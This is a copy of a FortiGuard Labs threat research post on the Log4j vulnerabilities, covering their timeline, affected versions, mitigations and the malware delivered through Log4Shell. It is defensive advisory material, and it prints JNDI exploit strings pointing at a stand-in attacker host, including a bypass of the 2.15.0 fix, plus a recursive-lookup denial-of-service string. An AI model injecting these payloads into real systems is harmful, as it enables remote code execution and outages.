{"id":17990,"date":"2022-02-02T10:18:40","date_gmt":"2022-02-02T18:18:40","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11723\/"},"modified":"2022-02-02T10:18:40","modified_gmt":"2022-02-02T18:18:40","slug":"news-11723","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11723\/","title":{"rendered":"Critical Apache Log4j Vulnerability Updates"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs.html?utm_source=blog&amp;utm_medium=campaign&amp;utm_campaign=FortiGuardLabs\">FortiGuard Labs<\/a>\u00a0Threat\u00a0Research Report<\/h2>\n<p><b>Affected Platforms:<\/b> Any application and service that uses vulnerable version of Log4j2<br \/> <b>Impacted Users:<\/b> Any organization that uses vulnerable version of Log4j<br \/> <b>Impact: <\/b>Remote attackers gain control of the vulnerable systems<br \/> <b>Severity Level:<\/b> Critical <\/p>\n<p><i>Thanks to Paolo Di Prodi and Arturo Erick Torres Cavazos, who helped contribute to this blog.<br \/> <\/i><\/p>\n<h2>Log4j Vulnerabilities<\/h2>\n<p>Beginning December 9<sup>th<\/sup>, most of the internet-connected world was forced to reckon with a critical new vulnerability discovered in the Apache Log4j framework deployed in countless servers. Officially labeled <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228\" target=\"_blank\">CVE-2021-44228<\/a>, but colloquially known as \u201cLog4Shell\u201d, this vulnerability is both trivial to exploit and allows for full remote code execution on a target system. This has earned the vulnerability a <a href=\"https:\/\/nvd.nist.gov\/vuln-metrics\/cvss\" target=\"_blank\">CVSS<\/a> score of 10 \u2013 the maximum.<\/p>\n<p>On December 14<sup>th<\/sup>, the Apache Software Foundation revealed a second Log4j vulnerability (<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45046\" target=\"_blank\">CVE-2021-45046<\/a>). It was initially identified as a Denial-of-Service (DoS) vulnerability with a CVSS score of 3.7 and moderate severity. Things went from bad to worse on December 16<sup>th<\/sup> due to the discovery of information leaks and the remote code execution nature of the vulnerability. This promoted Apache to update the advisory and upgrade the CVSS score for this vulnerability to 9.0.<\/p>\n<p>On December 18<sup>th<\/sup>, a third Log4J vulnerability was discovered (<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45105\" target=\"_blank\">CVE-2021-45105<\/a> &#8211; Apache Log4j2 does not always protect against infinite recursion in lookup evaluation). This fix was released in response to a newly discovered vulnerability that makes Log4j susceptible to a Denial-of-Service attack (DoS).<\/p>\n<p>On December 19<sup>th<\/sup>, a &quot;wormable&quot; variant of the Mirai IoT malware incorporating exploit code for CVE-2021-44228 was discovered. Various chatter on OSINT channels has discussed whether this is a &quot;worm.&quot;<\/p>\n<p>This blog describes what you need to know about the <a href=\"https:\/\/www.fortinet.com\/blog\/psirt-blogs\/apache-log4j-vulnerability?utm_source=blog&amp;utm_campaign=log4j_psirt\">Apache Log4j vulnerabilities<\/a>, including details, campaigns associated with Log4j, and an alleged \u201cwormable\u201d Mirai malware variant.<\/p>\n<h2><span style=\"font-weight: normal;\">What is Log4j? Significance of Log4j Vulnerabilities<\/span><\/h2>\n<p>Log4j is an extensible, Java-based logging framework widely used by applications and services around the globe (CISA <a href=\"https:\/\/github.com\/cisagov\/log4j-affected-db\/blob\/develop\/SOFTWARE-LIST.md\" target=\"_blank\">list<\/a> of related software). Often, a dependency on Log4j will be two to three layers deep (a dependency of a dependency). The ubiquitous nature of Log4j is part of what makes CVE-2021-44228 so dangerous. Millions of applications, such as iCloud, Steam, and Minecraft, use Log4j for logging. An attacker simply needs to get the app to log a special string to successfully exploit this vulnerability.<\/p>\n<p>The Log4j framework provides an interface with the JNDI (Java Naming and Directory Interface), which allows a connection to an external directory service such as LDAP (Lightweight Directory Access Protocol). This forms the basis of several exploitation attempts currently seen in the wild, whereby insecure JNDI lookups potentially allow an unauthenticated, remote attacker to execute arbitrary code.<\/p>\n<p>Interestingly, the initial exploit leveraging CVE-2021-44228 appears to have been created before the patch was released. According to <a href=\"https:\/\/twitter.com\/eastdakota\/status\/1469800951351427073\" target=\"_blank\">Cloudflare<\/a>, the exploit was found as early as December 1<sup>st<\/sup>, nine days before the patch release. It is also worthy of a mention that Minecraft was the canary in the coalmine highlighting the problem, as it was <a href=\"https:\/\/techraptor.net\/gaming\/news\/minecraft-servers-could-be-affected-by-apache-remote-code-exploit\" target=\"_blank\">one of the first servers<\/a> to be attacked.<\/p>\n<h2><span style=\"font-weight: normal;\">What Happ<\/span>ened?<\/h2>\n<p>On November 24<sup>th<\/sup>, Alibaba\u2019s Cloud Security Team reported a critical vulnerability in Log4j to The Apache Software Foundation. In response, Apache published a release candidate on December 6th to address this vulnerability, which Alibaba\u2019s Cloud Security team found insufficient. Before Apache made the necessary update, a tweet was posted on December 9<sup>th,<\/sup> insinuating that abusing JNDI Lookup in Log4j can lead to remote code execution. This post appears to have triggered a maelstrom in both security and hacker communities.<\/p>\n<p>The following day, Apache released Log4j 2.15.0 as an official fix. Around this time, attackers started to sniff for potential victims by scanning for vulnerable machines. On the same day, CISA released an <a href=\"https:\/\/www.cisa.gov\/uscert\/ncas\/current-activity\/2021\/12\/10\/apache-releases-log4j-version-2150-address-critical-rce\" target=\"_blank\">advisory<\/a> urging users and admins to upgrade Log4j to 2.15.0 as soon as possible. The advisory was followed by an <a href=\"https:\/\/www.cisa.gov\/uscert\/apache-log4j-vulnerability-guidance\" target=\"_blank\">Apache Log4j Vulnerability Guidance<\/a> page detailing the issue.<\/p>\n<p>SANS then moved their <a href=\"https:\/\/isc.sans.edu\/infocon.html\" target=\"_blank\">Infocon alert<\/a> to yellow for the first time since the infamous WannaCry outbreak in 2017. Infocon alerts intend to reflect changes in malicious traffic and the possibility of disrupted connectivity and apply to the condition of the Internet infrastructure. Infocon has only previously been elevated to yellow status for severe incidents, such as Heartbleed and Shellshock (both in 2014), which signifies the severity of Log4Shell.<\/p>\n<p>The situation worsened on December 14<sup>th<\/sup>, when Apache released Log4j 2.16.0 due to an insufficient fix in the previous release. This second vulnerability, labeled <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45046\" target=\"_blank\">CVE-2021-45046<\/a> (with a CVSS score of 3.7), causes a Denial of Service (DoS) condition when successfully exploited. Threat actors wasted no time leveraging Lo4Shell by deploying new malware and potentially unwanted programs (PUAs) to compromise vulnerable machines.<\/p>\n<p>On December 16<sup>th<\/sup>, Apache upgraded the CVSS score for CVE-2021-45046 from 3.7 to 9.0. Further investigation revealed that an information leak and remote code execution in some environments and local code execution in all environments could be achieved due to successful exploitation. The Severity was also changed from moderate to critical.<\/p>\n<p>Log4j version 2.17.0 was released on December 18<sup>th<\/sup> in response to another Log4j vulnerability. Labeled CVE-2021-45105, the newest security hole is a Denial-of-Service vulnerability with a CVSS score of 7.5 and is rated as High by Apache.<\/p>\n<h2>How does the exploit work &#8211; CVE-2021-44228?<\/h2>\n<ol>\n<li>Once a target has been selected, an attacker adds a JNDI query to a connection request to that target in a field that is likely to get logged via Log4j. For example: \u00a0\u201c$<i>{jndi:ldap:\/\/malicious-server.host\/aaa}<\/i>\u201d<\/li>\n<li>A vulnerable version of Log4j then takes that request and attempts to contact \u201cmalicious-server.host\u201d with an LDAP query.<\/li>\n<li>Should the connection be successful, the \u201cmalicious-server.host\u201d under the attacker&#8217;s control replies to the query by inserting a malicious Java class file location into the directory data.<\/li>\n<li>The Java implementation on the target then downloads the malicious Java class file and executes it.<\/li>\n<\/ol>\n<h2>How does the remote code execution exploit work &#8211; CVE-2021-45046?<\/h2>\n<ol>\n<li>Once a target has been selected, an attacker adds a JNDI query to a connection request to that target in a field that is likely to get logged via Log4j. Due to the fix for CVE-2021-44228 in Log3j 2.15.0, remote JNDI queries are no longer permitted by default.\u00a0 Therefore, this can be worked around using the following as an example:\u00a0 \u201c${jndi:ldap:\/\/127.0.0.1#malicious-server.host\/aaa}\u201d<\/li>\n<li>Version 2.15.0 of Log4j will view the request as valid due to localhost being present before the \u201c#\u201d; however, the framework will still resolve the entire string and attempt to contact \u201cmalicious-server.host\u201d with an LDAP query.<\/li>\n<li>Should the connection be successful, the \u201cmalicious-server.host\u201d under the attacker&#8217;s control replies to the query by inserting a malicious Java class file location into the directory data.<\/li>\n<li>The Java implementation on the target will then download the malicious Java class file and execute it.<\/li>\n<\/ol>\n<h2>How does the Denial of Service (DoS) exploit work &#8211; CVE-2021-45105?<\/h2>\n<p>This vulnerability is not considered part of Log4Shell. This will be more complex to execute because an attacker would need to have knowledge and control over lookup commands (e.g., via the Thread Context Map).\u00a0 The vulnerability is an infinite recursion so a successful exploit would result in a Denial-of-Service (DoS) attack.<\/p>\n<ol>\n<li>To take advantage of this, the vulnerable (or malicious) application will need to use a Context Map Lookup with a custom pattern layout. <\/li>\n<li>A log line can be crafted in such a way that when it is triggered, an infinite loop condition is triggered thereby creating a denial of service through the exhaustion of resources.<\/li>\n<\/ol>\n<p style=\"margin-left: 80.0px;\">e.g. logger.info(&quot;Example log line {}&quot;, &quot;${${::-${::-$${::-j}}}}&quot;); <\/p>\n<h2>Have attacks leveraging CVE-2021-44228 and CVE-2021-45046 increased?<\/h2>\n<p>FortiGuard Labs saw a steady increase in the detection of attacks using our IPS signature, which covers both CVE\u2019s &#8211; \u201cApache.Log4j.Error.Log.Remote.Code.Execution\u201d &#8211; up until December 15<sup>th<\/sup>.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\/_jcr_content\/root\/responsivegrid\/image.img.png\/1640131741914\/img-new.png\" alt=\"Figure 1. Detection volume for Apache.Log4j.Error.Log.Remote.Code.Execution since December 10th.\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1. Detection volume for Apache.Log4j.Error.Log.Remote.Code.Execution since December 10th.<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>What versions of Log4j are vulnerable?<\/h2>\n<ul>\n<li><b>CVE-2021-44228<\/b>: All Log4j versions from 2.0-beta9 through 2.12.1, and 2.13.0 through 2.14.1 (also includes 2.15.0-rc1) are vulnerable.<\/li>\n<li><b>CVE-2021-45046<\/b><span>: Log4j versions from 2.0-beta9 through 2.15.0<\/span> <\/li>\n<li><b>CVE-2021-45105<\/b><span>: Log4j versions from 2.0-beta9 to 2.16.0<\/span> <\/li>\n<\/ul>\n<h2>Have these vulnerabilities been patched?<\/h2>\n<p>Yes, Java 8 or later users are advised to update to Log4j 2.17.0 as soon as possible. However, due to the incompleteness of the fix offered in 2.15.0, Apache released subsequent Log4j versions 2.16.0, 2.17.0 which users are strongly advised to apply.<\/p>\n<p>For Java 7, users should upgrade to version 2.12.2.<\/p>\n<h2>Has the vendor provided any mitigations?<\/h2>\n<p>Yes, Apache has provided the following <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html#cve-2021-44228\" target=\"_blank\">mitigation information<\/a> for Log4Shell (CVE-2021-44228):<\/p>\n<p style=\"margin-left: 40.0px;\">Log4j 1.x mitigation: Log4j 1.x does not have Lookups, so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when using JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. This vulnerability does not impact Log4j 1.x configurations without JMSAppender.<\/p>\n<p style=\"margin-left: 40.0px;\">Log4j 2.x mitigation: Implement one of the mitigation techniques below.<\/p>\n<p style=\"margin-left: 40.0px;\">Java 8 (or later) users should upgrade to release 2.16.0.<br \/> Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon). <\/p>\n<p style=\"margin-left: 40.0px;\">Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<\/p>\n<p style=\"margin-left: 40.0px;\">Note that this vulnerability impacts only the log4j-core JAR file. Applications using only the log4j-api JAR file without the log4j-core JAR file are not affected by this vulnerability.<\/p>\n<p>Apache has provided the following <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html#cve-2021-45046\" target=\"_blank\">mitigation information<\/a> for CVE-2021-45046:<\/p>\n<p style=\"margin-left: 40.0px;\">Log4j 1.x mitigation<br \/> Log4j 1.x is not impacted by this vulnerability.<\/p>\n<p style=\"margin-left: 40.0px;\">Log4j 2.x mitigation<br \/> Implement one of the following mitigation techniques:<\/p>\n<p style=\"margin-left: 40.0px;\">Java 8 (or later) users should upgrade to release 2.16.0.<br \/> Java 7 users should upgrade to release 2.12.2.<br \/> Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<br \/> Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2.<\/p>\n<p style=\"margin-left: 40.0px;\">Note that this vulnerability impacts only the log4j-core JAR file. Applications using only the log4j-api JAR file without the log4j-core JAR file are not affected by this vulnerability.<\/p>\n<p style=\"margin-left: 40.0px;\">Also, note that Apache Log4j is the only Logging Services subproject affected by this vulnerability. This does not impact other projects like Log4net and Log4cxx. <\/p>\n<p>Apache has provided the following <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html#CVE-2021-45105\" target=\"_blank\">mitigation information<\/a> for CVE-2021-45105:<\/p>\n<p style=\"margin-left: 40.0px;\">Log4j 1.x mitigation<br \/> Log4j 1.x is not impacted by this vulnerability.<\/p>\n<p style=\"margin-left: 40.0px;\">Log4j 2.x mitigation<br \/> Implement one of the following mitigation techniques:<\/p>\n<p style=\"margin-left: 40.0px;\">Java 8 (or later) users should upgrade to release 2.17.0. Alternatively, this can be mitigated in the configuration: <\/p>\n<p style=\"margin-left: 80.0px;\">In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).<\/p>\n<p style=\"margin-left: 80.0px;\">Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.<\/p>\n<p style=\"margin-left: 40.0px;\">Note that this vulnerability impacts only the log4j-core JAR file. Applications using only the log4j-api JAR file without the log4j-core JAR file are not affected by this vulnerability.<\/p>\n<p style=\"margin-left: 40.0px;\">Also, note that Apache Log4j is the only Logging Services subproject affected by this vulnerability. This does not impact other projects like Log4net and Log4cxx.<\/p>\n<h2>Does Fortinet protect against exploit attempts?<\/h2>\n<p>Yes, Fortinet released IPS signature \u201cApache.Log4j.Error.Log.Remote.Code.Execution\u201d, with VID 51006 to block exploit attempts for both CVE-2021-44228 and CVE-2021-45046. This signature was initially released in IPS package version 19.215. FortiGuard Labs provides IPS signature \u201cApache.Log4j.Error.Log.Thread.Context.DoS\u201d against CVE-2021-45105.<\/p>\n<h2>What malware and potentially unwanted applications(PUA) were observed to have been deployed via attacks leveraging Log4Shell?<\/h2>\n<p>Malware such as Khonsari ransomware, Kinsing, Mirai, Muhstik, Elknot, m8220, Orcus RAT, XMRig, SitesLoader, and Nanocore RAT are all reported to have been delivered in these subsequent attacks. A video was also posted showing that it is possible to run the first-person shooting game Doom on a Minecraft server by abusing the vulnerability.<\/p>\n<p>Below are short descriptions of each malware type:<\/p>\n<h3>Khonsari ransomware<br \/> <\/h3>\n<p>Khonsari is ransomware that encrypts files in specific folders on compromised machines and demands a ransom to decrypt them. It is called Khonsari because it adds .khonsari file extension to the files it encrypts.<\/p>\n<h3>Kinsing<br \/> <\/h3>\n<p>Kinsing is malware written in Go that runs a cryptominer and attempts to propagate within the compromised environment. Kinsing has been around as early as January 2020.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\/_jcr_content\/root\/responsivegrid\/image_1753824859.img.png\/1639763457764\/img2.png\" alt=\"Figure 2. Kinsing dropper downloading payload from 92.242.40.21\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2. Kinsing dropper downloading payload from 92.242.40.21<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3>Mirai<br \/> <\/h3>\n<p>Mirai is multi-architecture Linux-based malware. Initially deployed on exposed networking devices, it is increasingly being used against IoT (Internet of Things) devices. Once infected, a compromised device becomes a bot that is absorbed into a botnet (a collection of bots). These botnets are primarily used for Distributed Denial of Service (DDoS) attacks.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\/_jcr_content\/root\/responsivegrid\/image_154451723.img.png\/1639763508889\/img3.png\" alt=\"Figure 3. The domain \u2019nazi.uy\u2019 is an indicator of Mirai\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3. The domain \u2019nazi.uy\u2019 is an indicator of Mirai<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>FortiGuard Labs previously posted blogs on Mirai malware:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability\">MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability<\/a><\/li>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/the-ghosts-of-mirai\">The Ghosts of Mirai<\/a><\/li>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/industry-trends\/mirai-botnet-protect-your-infrastructure-with-fortiddos\">Mirai Botnet \u00ad: Protect Your Infrastructure with FortiDDoS<\/a><\/li>\n<\/ul>\n<h3>Elknot<\/h3>\n<p>Also known as BillGates, this was initially only a Linux-based malware. However, it has since been ported to Windows. The malware is used to launch Distributed Denial of Service (DDoS) attacks.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\/_jcr_content\/root\/responsivegrid\/image_842550724.img.png\/1639763617928\/img4.png\" alt=\"Figure 4. Elknot binary with function names. CAttackCompress is the mostly used attack command\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4. Elknot binary with function names. CAttackCompress is the mostly used attack command<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3>m8220<\/h3>\n<p>m8220 is a mining botnet for Windows and Linux platforms.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\/_jcr_content\/root\/responsivegrid\/image_814698883.img.png\/1639763669964\/img5.png\" alt=\"Figure 5. M8220 is trying to propagate through SSH by parsing the user\u2019s folder and bash history for usernames, passwords, SSH keys.\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5. M8220 is trying to propagate through SSH by parsing the user\u2019s folder and bash history for usernames, passwords, SSH keys.<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3>Muhstik<\/h3>\n<p>Muhstik is Linux malware that turns a compromised machine into a bot and is known to exploit vulnerabilities for propagation. One of the notable vulnerabilities exploited by Muhstik is Atlassian.Confluence.CVE-2021-26084.Remote.Code.Execution (CVE-2021-26084).<\/p>\n<p>FortiGuard Labs previously posted a blog on Muhkstik:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/recent-attack-uses-vulnerability-on-confluence-server\">Recent Attack Uses Vulnerability on Confluence Server<\/a><\/li>\n<\/ul>\n<h3>Orcus RAT<\/h3>\n<p>Orcus is a Remote Access Trojan (RAT) that has been heavily advertised and sold in underground forums since at least 2016. Although a Canadian software developer was arrested for creating and selling the RAT in 2019, Orcus RAT is in use today as its source code was leaked. As a RAT, it performs various actions on a compromised machine via commands received from its Command and Control server (C&amp;C).<\/p>\n<h3>SitesLoader<\/h3>\n<p>The shell script dropper below downloads a UPX packed Go binary from http:\/\/103.104.73.155:8080\/index . This binary is also an XMRig crypto miner.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\/_jcr_content\/root\/responsivegrid\/image_1492820975.img.png\/1639763765639\/img6.png\" alt=\"Figure 6. SitesLoader dropper, downloading the XMRig miner from 103.104.73.155.\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6. SitesLoader dropper, downloading the XMRig miner from 103.104.73.155.<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3>XMRig<\/h3>\n<p>XMRig is an open-source cryptomining software that is used to mine Monero cryptocurrency. While XMRig is a legitimate software, it is often abused by threat actors to illegally mine Monero on the compromised machine.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\/_jcr_content\/root\/responsivegrid\/image_770520688.img.png\/1639763814380\/img7.png\" alt=\"Figure 7. Downloading and executing the xmrig.exe.\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7. Downloading and executing the xmrig.exe.<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3>Nanocore RAT<br \/> <\/h3>\n<p>Nanocore is a modular Remote Access Trojan (RAT) that has been around since 2013. The RAT was available for purchase and cracked versions were leaked online. Nanocore performs typical RAT activities on the compromised machine, such as data exfiltration, keylogging, hijacking the webcams, and capturing screenshots.<\/p>\n<h2><span style=\"font-weight: normal;\">Has any Malware Incorporated the Recent Log4j Exploits for Propagation?<\/span><\/h2>\n<p>FortiGuard Labs is aware of an online report that a variant of Mirai performs propagation by exploiting the Log4Shell vulnerability as such is a worm.<\/p>\n<p>Our analysis concludes that this Mirai variant is equipped with the Log4Shell exploit and <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17215\" target=\"_blank\">CVE-2017-17215<\/a>, a remote code execution vulnerability in Huawei HG532 routers, and does not exhibit worm-like functionality.<\/p>\n<p>So, while our findings reveal that, like a worm, it can propagate, what makes it not a worm is that the botmaster controls all instructions. This is because it relies on an external resource for propagation and instruction. The botmaster also has the luxury of turning on and off scans.<\/p>\n<p>FortiGuard Labs detects this Mirai variant by AV as ELF\/Mirai.VI!tr.<\/p>\n<p>FortiGuard Labs provides IPS coverage against CVE-2017-17215 as \u201cHuawei.HG532.Remote.Code.Execution\u201d.<\/p>\n<p>For FortiEDR, all known samples have been added to our cloud intelligence and will be blocked if executed.<\/p>\n<h2>Has Fortinet released any publications regarding the recent Log4j vulnerabilities?<\/h2>\n<p>Yes, Fortinet has released several publications since the issue came to light. Below is the list of released publications:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.fortiguard.com\/outbreak-alert\/log4j2-vulnerability\">Log4j2 Vulnerability<\/a> (Outbreak Alert)<\/li>\n<li><a href=\"https:\/\/www.fortiguard.com\/threat-signal-report\/4335\/apache-log4j-remote-code-execution-vulnerability-cve-2021-44228\">Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228)<\/a> (Threat Signal)<\/li>\n<li><a href=\"https:\/\/www.fortiguard.com\/threat-signal-report\/4339\/new-log4j-vulnerability-cve-2021-45046-results-in-denial-of-service\">New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service<\/a> (Threat Signal)<\/li>\n<li><a href=\"https:\/\/www.fortiguard.com\/threat-signal-report\/4345\/log4j-2-17-0-released-in-response-to-new-log4j-vulnerability-cve-2021-45105\">Log4j 2.17.0 Released In Response to New Log4j Vulnerability (CVE-2021-45105)<\/a> (Threat Signal)<\/li>\n<li><a href=\"https:\/\/www.fortiguard.com\/threat-signal-report\/4346\/mirai-malware-that-allegedly-propagates-using-log4shell-spotted-in-the-wild\">Mirai Malware that Allegedly Propagates Using Log4Shell Spotted in the Wild<\/a> (Threat Signal)<\/li>\n<li><a href=\"https:\/\/www.fortiguard.com\/psirt\/FG-IR-21-245?utm_source=blog&amp;utm_campaign=blog\">Apache log4j2 log messages substitution (CVE-2021-44228)<\/a> (PSIRT advisory)<\/li>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/psirt-blogs\/apache-log4j-vulnerability\">CVE-2021-44228 &#8211; Apache Log4j Vulnerability<\/a> (PSIRT blog)<\/li>\n<li><a href=\"https:\/\/www.fortiguard.com\/encyclopedia\/ips\/51006\">Apache.Log4j.Error.Log.Remote.Code.Execution<\/a> (Threat Encyclopedia)<\/li>\n<li><a href=\"https:\/\/community.fortinet.com\/t5\/FortiEDR\/Technical-Tip-How-FortiEDR-protects-against-the-exploitation-of\/ta-p\/201027\">Technical Tip: How FortiEDR protects against the exploitation of Log4shell<\/a> (FortiEDR)<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Conclusion<\/h2>\n<p>The Log4j vulnerabilities had a significant global impact similar to previous major threats, such as Wannacry, Heartbleed, and Shellshock. Because it is deployed so widely, the after-effects of this vulnerability are expected to last for some time as so many enterprise applications and cloud services require updating. While the world has not yet seen any massive malware delivery events (i.e., a major ransomware outbreak, wormable events) that leverage the Log4j vulnerabilities, history tells us not to let our guard down, especially since the holiday season, when threat-actors typically become more active, is fast approaching.<\/p>\n<p>FortiGuard Labs will continue to actively monitor the situation for further insights and provide additional information about protections as they become available.<\/p>\n<h3>Fortinet Protections and Mitigations<\/h3>\n<p>FortiGuard Labs provides the following IPS signatures against CVE-2021-44228 (Log4Shell), CVE-2021-45046 and CVE-2021-45105:<\/p>\n<p style=\"margin-left: 40.0px;\"><a href=\"https:\/\/www.fortiguard.com\/encyclopedia\/ips\/51006\">Apache.Log4j.Error.Log.Remote.Code.Execution<\/a> (CVE-2021-44228 and CVE-2021-45046)<br \/> <a href=\"https:\/\/www.fortiguard.com\/encyclopedia\/ips\/51050\">Apache.Log4j.Error.Log.Thread.Context.DoS<\/a> (CVE-2021-45105) <\/p>\n<p>Visit <a href=\"https:\/\/www.fortiguard.com\/outbreak-alert\/log4j2-vulnerability\">Outbreak Alert<\/a> for more information on how Fortinet protects users from Log4Shell.<\/p>\n<p>FortiGuard Labs provides the following AV protection against malware, potentially unwanted programs (PUA), and other files involved as the following:<\/p>\n<p style=\"margin-left: 40.0px;\">MSIL\/Filecoder.ANF!tr.ransom (Khonsari ransomware)<br \/> BASH\/CoinMiner.RZ!tr (kinsing)<br \/> ELF\/CoinMiner.CFA!tr (kinsing)<br \/> ELF\/Ganiw.A!tr (Elknot)<br \/> Linux\/Mirai.B!tr.bdr (Mirai)<br \/> Linux\/Tsunami.NCD!tr (Mirai)<br \/> Adware\/Tsunami (Mirai)<br \/> ELF\/DDoS.CIA!tr (Muhstik)<br \/> BASH\/Miner.BO!tr.dldr (m8220)<br \/> Java\/khonsari.DF40!tr (Orcus RAT)<br \/> BASH\/Miner.UF!tr (SitesLoader)<br \/> Adware\/Miner (SitesLoader)<br \/> BASH\/Agent.ACA8!tr.dldr<br \/> Riskware\/CoinMiner.PO (XMRig)<br \/> Riskware\/CVE202144228 (XMRig)BAT\/Agent.Q!tr.dldr (XMRig)<br \/> W32\/GenKryptik.FBSU!tr (Nanocore RAT) <\/p>\n<p>All network IOCs are blocked by the WebFiltering 